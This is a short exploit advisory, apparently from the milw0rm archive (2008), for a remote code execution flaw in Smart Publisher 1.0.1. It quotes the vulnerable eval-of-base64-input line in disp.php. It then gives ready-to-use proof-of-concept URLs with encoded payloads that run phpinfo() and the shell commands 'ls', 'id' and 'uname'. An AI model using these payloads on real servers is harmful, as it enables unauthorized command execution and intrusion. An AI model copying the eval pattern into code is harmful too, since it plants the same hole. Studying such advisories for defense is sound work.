###### ###### ############## ###### ###### ######## ##
#### ## ## ## ## ## ## ## ##
######## ## ## ## ######## ## #### ###### ## ## ######## ## ######
## ## ## ## ## ## ## ## #### ## ## ## ## ## ##
########## ## ## ## ########## ## ## ## ########## ## ###### ##
## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## #### ## ## ### ## ## ## ## ## ## ## ##
######### ###### #### ######### ### ###### ########## ###### ########## ###### ##########
######################################################################
### Smart Publisher 1.0.1 (disp.php) Remote Code Execution Exploit ###
### Script : http://sourceforge.net/projects/smart-publisher/ ###
### Vuln Code In '/admin/op/disp.php'In Line '3' ###
### eval("\$v=".base64_decode($filedata).";"); <- Vuln ###
### POC : ###
### /admin/op/disp.php?filedata=cGhwaW5mbygp <= phpinfo() Base64 ###
### ?filedata=cGFzc3RoZXUobHMgLWxpYTtpZDt1bmFtZSAtYSk <= passtheu(ls -lia;id;uname -a)
######################################################################
# milw0rm.com [2008-01-29]